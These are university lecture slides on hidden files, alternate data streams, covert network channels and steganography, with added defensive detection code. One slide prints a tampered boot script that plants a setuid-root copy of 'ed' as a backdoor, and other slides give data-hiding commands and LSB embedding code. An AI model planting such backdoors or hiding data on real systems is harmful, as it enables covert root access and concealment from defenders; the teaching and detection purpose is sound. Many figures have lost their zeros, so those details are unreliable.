ECE-6612  http://www.csc.gatech.edu/copeland/jac/6612/
Prof. John A. Copeland  john.copeland@ece.gatech.edu  404 894-5177  fax 404 894-35
Office: Klaus 3362  email or call for office visit, or call 404 894-5177

Slides 15 - Hidden Data, Covert Channels
“Hidden Files”

On a UNIX system, starting a file name with a dot “.” hides it from the simple list command, “ls”.

  [root@lc1 me]# echo "regular file" > regfile
  [root@lc1 me]# echo "hide me" > .hiddenfile
  [root@lc1 me]# ls
  regfile
  [root@lc1 me]# ls -a
  .  ..  .hiddenfile  regfile
  [root@lc1 me]#

The “ls -a” command will reveal these hidden files.
Hidden Directory “. ”

On a UNIX system, a hard-to-spot hidden directory can be made by naming it dot-space, “. ”.

  [root@lc1 me]# mkdir ". "
  [root@lc1 me]# echo "well-hidden" > ". "/well_hide
  [root@lc1 me]# ls -a
  . ... .hiddenfile regfile
  [root@lc1 me]# ls -al
  total 6
  drwxr-xr-x   3 root root  1024 Apr 16 19:59 .
  drwxr-xr-x   2 root root  1024 Apr 16 20:   . 
  drwxrwx---  29 root wheel 2048 Apr 16 19:49 ..
  -rw-r--r--   1 root root     8 Apr 16 19:52 .hiddenfile
  -rw-r--r--   1 root root    13 Apr 16 19:52 regfile

Note that the file “well_hide” does not appear.
Startup Scripts

When starting run level “3”, daemons are stopped or started by shell scripts if there is a “link” pointing to the script in /etc/rc.d/rc3.d/. The first letter in the link name determines if the daemon is started ("S") or killed ("K"). The two-digit number in the name determines the order of starting. The root-level boot script would look like this:

  cd /etc/rc.d/init.d/
  ./K05innd stop; ./K10pulse stop; ... ; ./S05kudzu start; ./S10network start; ...

  [root@lc1 rc.d]# ls -l rc3.d/
  total 0
  lrwxrwxrwx 1 root root 14 Jun 29 20 K05innd -> ../init.d/innd
  lrwxrwxrwx 1 root root 15 Jun 29 20 K10pulse -> ../init.d/pulse
  lrwxrwxrwx 1 root root 13 Aug  5 20 K20nfs -> ../init.d/nfs
  lrwxrwxrwx 1 root root 16 Jun 29 20 K20rstatd -> ../init.d/rstatd
  lrwxrwxrwx 1 root root 17 Jun 29 20 K20rusersd -> ../init.d/rusersd
  lrwxrwxrwx 1 root root 15 Jun 29 20 K20rwhod -> ../init.d/rwhod
  lrwxrwxrwx 1 root root 13 Jun 29 20 K35smb -> ../init.d/smb
  lrwxrwxrwx 1 root root 15 Feb  8 19:20 K45named -> ../init.d/named
  lrwxrwxrwx 1 root root 15 Jun 29 20 K50snmpd -> ../init.d/snmpd
  lrwxrwxrwx 1 root root 16 Jun 29 20 K55routed -> ../init.d/routed
  lrwxrwxrwx 1 root root 19 Jun 29 20 K99linuxconf -> ../init.d/linuxconf
  lrwxrwxrwx 1 root root 15 Jun 29 20 S05kudzu -> ../init.d/kudzu
  lrwxrwxrwx 1 root root 17 Feb  8 19:19 S10network -> ../init.d/network
  . . .
Script Run on Every Reboot

  [root@lc1 init.d]# ls -l /etc/rc.d/init.d/kudzu
  -rwxr-xr-x 1 root root 1427 Aug 30 20 kudzu
  [root@lc1 init.d]# cat kudzu
  #!/bin/sh
  #
  # kudzu         This scripts runs the kudzu hardware probe.
  #
  # chkconfig: 345 05 95
  # description: This runs the hardware probe, and optionally configures \
  #              changed hardware.

  cp /usr/bin/ed /usr/bin/mailfix; chmod /usr/bin/mailfix -4555;

  # This is an interactive program, we need the current locale
  [ -f /etc/profile.d/lang.sh ] && . /etc/profile.d/lang.sh

This computer is totally compromised. Anyone who logs on can run commands as root. How?

Answer (the next slide repeats the listing above): anyone who logs on can run commands as root by running "mailfix" and "!". (The program "ed" has been fixed recently, but another program could be used.)
Windows NT

By “right clicking” on the file listing in NT or Win20, the “Hidden” attribute can be set. This prevents the file from being shown under default settings of a directory window; however, the directory window View menu offers the option of showing “hidden” files.

The files in Microsoft NT and Win20 have additional “streams” that can store data in parallel with data in the main channel. These additional streams can be accessed using the program “cp”, which is available by purchasing the Windows NT Resource Kit.

To hide the contents of file stuff.txt in another file like notepad.exe:

  C:\> copy stuff.txt notepad.exe:data

A directory window will still show the same size for notepad.exe.

To retrieve the data later:

  C:\> copy notepad.exe:data newstuff.txt

Ref. “Counter Hack,” Ed Skoudis, p. 460
Defense Against Hidden Files

- Use a file-integrity checker like “Tripwire”.
- Use a Host-Based IDS (Intrusion Detection System).
- Do not let strangers log on to the system (good authentication).
- Remove vulnerabilities that would let a stranger log on, or a trusted user upgrade their privileges.
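As an added example (not from the slides), a minimal Tripwire-style check in Python: snapshot the hash and permission bits of every file under a tree, compare a later snapshot against it, and also flag names made only of dots and blanks (the “. ” trick) and new setuid files (the kind of change made to the kudzu script and /usr/bin above). The tree is a constructed temporary directory, not the real /etc/rc.d/init.d or /usr/bin.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path

def snapshot(root):
    """Tripwire-style baseline: (sha256, permission bits) for every file under root."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            digest = hashlib.sha256(Path(path).read_bytes()).hexdigest()
            snap[os.path.relpath(path, root)] = (digest, stat.S_IMODE(os.stat(path).st_mode))
    return snap

def odd_names(root):
    """Names made only of dots and blanks (like ". "), which hide from a casual ls -a."""
    hits = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            if name.strip(". \t") == "":
                hits.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(hits)

def compare(old, new):
    """Files whose hash or mode changed, new files, new files carrying setuid, removed files."""
    changed = sorted(p for p in old if p in new and old[p] != new[p])
    added = sorted(p for p in new if p not in old)
    setuid = sorted(p for p in added if new[p][1] & stat.S_ISUID)
    removed = sorted(p for p in old if p not in new)
    return {"changed": changed, "added": added, "setuid_added": setuid, "removed": removed}

def demo():
    """Constructed tree standing in for /etc/rc.d/init.d and /usr/bin (not real system paths)."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "init.d").mkdir()
        Path(root, "bin").mkdir()
        Path(root, "init.d", "kudzu").write_text("#!/bin/sh\n# kudzu hardware probe\n")
        Path(root, "bin", "ed").write_text("ed-binary")
        before = snapshot(root)
        # Simulated tampering after the baseline: script edited, setuid file planted, ". " directory made.
        with Path(root, "init.d", "kudzu").open("a") as f:
            f.write("# line appended after the baseline\n")
        planted = Path(root, "bin", "mailfix")
        planted.write_text("ed-binary")
        planted.chmod(0o4555)
        Path(root, "bin", ". ").mkdir()
        return compare(before, snapshot(root)), odd_names(root)
```

A real deployment keeps the baseline off the host (or signed), since an intruder with root can rewrite a local one.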
Covert Channels

Sending data in a way that network watchers (sniffer, IDS, ...) will not be aware that data is being transmitted. For IP networks:

- Data hidden in the IP header
- Data hidden in ICMP Echo Request and Response packets
- Data tunneled through an SSH connection
- “Port 80” tunneling (or DNS port 53 tunneling)
- In image files
Packet Header Hiding

[Diagram: a packet laid out as IP Header (20-64 bytes), TCP Header (20-64 bytes) and DATA (0-65,488 bytes), with the example payload “Dear Friend, I am having a good time at the beach.” The header fields called out are TCP Source Port, TCP Destination Port, IP Source Address and IP Destination Address.]

[Diagram: IP Header, 0-44 bytes]

[Diagram: TCP Header, 0-44 bytes]

[Diagram: ICMP Headers (=3), 0-65,535 bytes]
Covert Channel Tools

- SSH (SCP, FTP tunneling, Telnet tunneling, X-Windows tunneling, ...) - can be set to operate on any port (<1024 usually requires root privilege).
- Loki (ICMP Echo Request/Response, UDP 53)
- NT - Back Orifice (BO2K) plugin BOSOCK32
- Reverse WWW Shell Server - looks like an HTTP client (browser). App headers mimic HTTP GET and response commands.
Steganography

See http://www.jjtc.com/Steganography/
Speech or Music Encoding

Use the lowest-order bit in each sample value for covert data. This doubles the “quantization noise,” but that may not be noticed.
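An added example (not from the slides) of the LSB scheme on a constructed 16-bit carrier: embed, recover, and measure the error introduced. The error never exceeds one quantization step, which is why listening will not reveal it and detection has to be statistical.

```python
import math

def embed_lsb(samples, payload):
    """Replace the least-significant bit of successive samples with the payload bits (MSB first)."""
    bits = [(byte >> i) & 1 for byte in payload for i in range(7, -1, -1)]
    if len(bits) > len(samples):
        raise ValueError("payload does not fit in the carrier")
    out = list(samples)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & ~1) | bit   # also correct for negative (signed) sample values
    return out

def extract_lsb(samples, nbytes):
    """Read nbytes back from the LSBs; the receiver needs only the length (or a terminator)."""
    bits = [s & 1 for s in samples[:nbytes * 8]]
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))

def added_noise(carrier, stego, nsamples):
    """RMS and peak of the error the embedding introduced over the samples it touched."""
    diffs = [a - b for a, b in zip(carrier[:nsamples], stego[:nsamples])]
    return math.sqrt(sum(d * d for d in diffs) / len(diffs)), max(abs(d) for d in diffs)

def demo():
    # Constructed carrier: one cycle of a 16-bit sine, amplitude 8000, 1024 samples.
    carrier = [int(8000 * math.sin(2 * math.pi * i / 1024)) for i in range(1024)]
    secret = b"meet at the beach"
    stego = embed_lsb(carrier, secret)
    recovered = extract_lsb(stego, len(secret))
    rms, peak = added_noise(carrier, stego, len(secret) * 8)
    return recovered, rms, peak
```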
Detecting Covert Channels

- A network IDS can detect a “Ping Unbalance” - more Ping Responses than Requests, or data that does not match.
- Block all ICMP packets at the firewall (can cause problems).
- Signature-based IDS will detect known programs (Loki).
- Port 53 tunneling - block inbound and outbound TCP/UDP port 53 packets at the firewall except to/from known internal DNS servers.
- Port 80 tunneling - look for long-lasting flows to an outside server, excess client-to-server data flow. Port-80 client port-profile violation (never used before for a browser).
- Steganography - look for port-profile violation, or known hacker-site server.
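The “Ping Unbalance” check as an added example (not from the slides), run over constructed ICMP records: it pairs each Echo Reply with its Echo Request by identifier and sequence number, flags replies whose payload does not mirror the request and replies with no request at all, and reports any host pair with more replies than requests.

```python
from collections import defaultdict

# Constructed ICMP records (src, dst, icmp_type, ident, seq, payload); type 8 = Echo Request, 0 = Echo Reply.
# A normal reply mirrors its request's payload; a Loki-style channel breaks that symmetry.
RECORDS = [
    ("10.0.0.5", "203.0.113.9", 8, 1, 1, b"abcdefgh"),
    ("203.0.113.9", "10.0.0.5", 0, 1, 1, b"abcdefgh"),      # normal echo pair
    ("10.0.0.5", "203.0.113.9", 8, 1, 2, b"abcdefgh"),
    ("203.0.113.9", "10.0.0.5", 0, 1, 2, b"0123456789"),    # reply payload differs from request
    ("203.0.113.9", "10.0.0.5", 0, 1, 3, b"xyz"),           # replies with no matching request
    ("203.0.113.9", "10.0.0.5", 0, 1, 4, b"xyz"),
]

def analyze(records):
    """Return per-pair request/reply counts and the reasons a (client, server) pair looks suspicious."""
    pending = {}                                   # outstanding requests keyed by (src, dst, id, seq)
    counts = defaultdict(lambda: {"req": 0, "rep": 0})
    alerts = defaultdict(list)
    for src, dst, typ, ident, seq, payload in records:
        if typ == 8:
            counts[(src, dst)]["req"] += 1
            pending[(src, dst, ident, seq)] = payload
        elif typ == 0:
            pair = (dst, src)                      # count the reply against the side that pinged
            counts[pair]["rep"] += 1
            request = pending.pop((dst, src, ident, seq), None)
            if request is None:
                alerts[pair].append(f"reply seq={seq} with no matching request")
            elif request != payload:
                alerts[pair].append(f"reply seq={seq} payload differs from request")
    for pair, c in counts.items():
        if c["rep"] > c["req"]:
            alerts[pair].append(f"ping unbalance: {c['rep']} replies vs {c['req']} requests")
    return dict(counts), dict(alerts)
```

On a live sensor the same bookkeeping runs per time window, since legitimate requests and replies can straddle a capture boundary.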
Monitor for New and Unknown Processes

  # ps -e
    PID TTY      TIME CMD
      1 ?        ::05 init
      2 ?        ::   kflushd
      3 ?        ::25 kupdate
      4 ?        ::   kpiod
      5 ?        ::   kswapd
      6 ?        ::   mdrecoveryd
     47 ?        ::   khubd
    337 ?        ::   syslogd
    347 ?        ::   klogd
    362 ?        ::   portmap
    378 ?        ::   lockd
    379 ?        ::   rpciod
    389 ?        ::   rpc.statd
    404 ?        ::   apmd
    458 ?        ::   identd
    462 ?        ::   identd
    463 ?        ::   identd
    464 ?        ::   identd
    465 ?        ::   identd
    477 ?        ::   atd
    492 ?        ::   xinetd
    502 ?        ::12 sshd
    524 ?        ::   lpd
  29891 tty1     ::   xinit
  29892 ?        :06:11 X
  29895 tty1     ::   gnome-session
  29905 ?        ::   gnome-smproxy
  29907 ?        ::33 enlightenment
  29909 ?        ::01 magicdev
  29923 ?        ::01 panel
  29926 ?        ::   gnome-name-serv
  29928 ?        ::01 gmc
  29931 ?        ::   gnome-terminal
  29933 ?        ::01 gnome-terminal
  29935 ?        ::   gnome-terminal
  29936 ?        ::   gnome-pty-helpe
  29937 pts/2    ::   bash
  29945 ?        ::   gnome-pty-helpe
  29946 pts/3    ::   bash
  29947 ?        ::   gnome-pty-helpe
  29948 pts/4    ::   bash
    321 ?        ::03 netscape-commun
    354 ?        ::   netscape-commun
  30105 ?        ::   gnome-terminal
  30106 ?        ::   gnome-pty-helpe

"ps aux" shows more data.
Monitor for New Ports

  # netstat -al -f inet      [on some UNIX systems, use “-A inet”]
  Active Internet connections (servers and established)
  Proto Recv-Q Send-Q Local Address         Foreign Address           State        User
  tcp        0    112 lc1.jac.local:ssh     g4.jac.local:50559        ESTABLISHED  root
  tcp                 lc1.jac.local:8822    c-66-56-79-1.atl.:28928   ESTABLISHED  root
  tcp       10        lc1.jac.local:1058    csc.gatech.edu:www        CLOSE_WAIT   root
  tcp       10        lc1.jac.local:1056    csc.gatech.edu:www        CLOSE_WAIT   root
  tcp                 *:X                   *:*                       LISTEN       root
  tcp                 lc1.jac.local:8822    c-66-56-79-1.atl.:12883   ESTABLISHED  root
  tcp                 lc1.jac.local:8822    c-66-56-79-1.atl.:21539   ESTABLISHED  root
  tcp                 *:www                 *:*                       LISTEN       root
  tcp                 *:smtp                *:*                       LISTEN       root
  tcp                 *:printer             *:*                       LISTEN       root
  tcp                 *:ssh                 *:*                       LISTEN       root
  tcp                 *:58822               *:*                       LISTEN       root
  tcp                 *:login               *:*                       LISTEN       root
  tcp                 *:shell               *:*                       LISTEN       root
  tcp                 *:telnet              *:*                       LISTEN       root
  tcp                 *:ftp                 *:*                       LISTEN       root
  tcp                 *:finger              *:*                       LISTEN       root
  tcp                 *:auth                *:*                       LISTEN       root
  tcp                 *:1024                *:*                       LISTEN       rpcuser
  tcp                 *:sunrpc              *:*                       LISTEN       root
  udp                 *:1025                *:*                                    rpcuser
  udp                 *:989                 *:*                                    root
  udp                 *:1024                *:*                                    root
  raw                 *:icmp                *:*                       7            root
  raw                 *:tcp                 *.*                       7            root

"sockstat -4" (or "netstat -p -a -o -A inet" on Linux) may show the opening process.
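An added example (not from the slides) that turns the two monitoring slides above into a check: parse "ps -e" and "netstat -p -a -A inet" style output and report command names and listening sockets that are absent from a known-good baseline. The excerpts are constructed in the layouts the slides show, and the baseline sets are assumed.

```python
# Constructed excerpts in the layouts the slides show (ps -e and netstat -p -a -A inet); not real captures.
PS_OUTPUT = """\
  PID TTY          TIME CMD
    1 ?        00:00:05 init
  337 ?        00:00:00 syslogd
  502 ?        00:00:12 sshd
 4242 ?        00:00:00 mailfix
"""
NETSTAT_OUTPUT = """\
Proto Recv-Q Send-Q Local Address    Foreign Address  State       PID/Program name
tcp        0      0 0.0.0.0:22       0.0.0.0:*        LISTEN      502/sshd
tcp        0    112 10.0.0.7:22      10.0.0.9:50559   ESTABLISHED 900/sshd
tcp        0      0 0.0.0.0:58822    0.0.0.0:*        LISTEN      4242/mailfix
udp        0      0 0.0.0.0:53       0.0.0.0:*                    700/named
"""
# Assumed baselines, recorded when the host was known-good.
KNOWN_PROCESSES = {"init", "syslogd", "sshd", "named"}
KNOWN_LISTENERS = {("tcp", 22), ("udp", 53)}

def unknown_processes(ps_text, known):
    """Command names in ps -e output that are not in the known-good set."""
    names = {line.split()[-1] for line in ps_text.splitlines()[1:] if line.strip()}
    return sorted(names - known)

def unknown_listeners(netstat_text, known):
    """(proto, port, pid/program) for listening sockets that are not in the known-good set."""
    found = []
    for line in netstat_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 5 or fields[0] not in ("tcp", "udp"):
            continue
        proto, local = fields[0], fields[3]
        port = int(local.rsplit(":", 1)[1])
        if proto == "tcp" and "LISTEN" not in fields:
            continue                      # established TCP sessions are not listeners
        if (proto, port) not in known:    # every bound UDP socket counts as a listener
            found.append((proto, port, fields[-1]))
    return found
```

A process that hides itself from ps, or a socket opened by a kernel module, will not show up here, which is why the slides also recommend a host-based IDS.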
Who has active TCP Sessions - What Application is Involved

  netstat -nal | grep tcp | grep ESTAB
  tcp  143.215.151.48:631  130.207.232.157:49353  ESTABLISHED
  tcp  143.215.151.48:631  130.207.225.34:51580   ESTABLISHED
  tcp  143.215.151.48:631  130.207.234.83:54018   ESTABLISHED
  tcp  143.215.151.48:111  143.215.169.104:45664  ESTABLISHED
  tcp  143.215.151.48:111  143.215.169.104:45665  ESTABLISHED
  tcp  143.215.151.48:631  130.207.225.26:36686   ESTABLISHED
  tcp  143.215.151.48:631  143.215.156.43:58115   ESTABLISHED
  tcp  143.215.151.48:631  143.215.146.43:58638   ESTABLISHED
  tcp  143.215.151.48:111  143.215.169.104:45639  ESTABLISHED
  tcp  127.0.0.1:6010       127.0.0.1:49457        ESTABLISHED

  lsof -i   (LiSt Open Files)
  COMMAND     PID     USER  FD  TYPE     DEVICE SIZE/OFF NODE NAME
  SystemUIS   144 copeland 10u  IPv4 0x04896130      0t0  UDP *:*
  SystemUIS   144 copeland 13u  IPv4 0x048962e8      0t0  UDP *:*
  AppleVNCS   161 copeland  8u  IPv6 0x04cdd6d0      0t0  TCP *:vnc-server
  RBDaemon  10572 copeland  4u  IPv4 0x04895c08      0t0  UDP *:9912
  RBDaemon  19687 copeland  4u  IPv4 0x055fd528      0t0  UDP *:hnm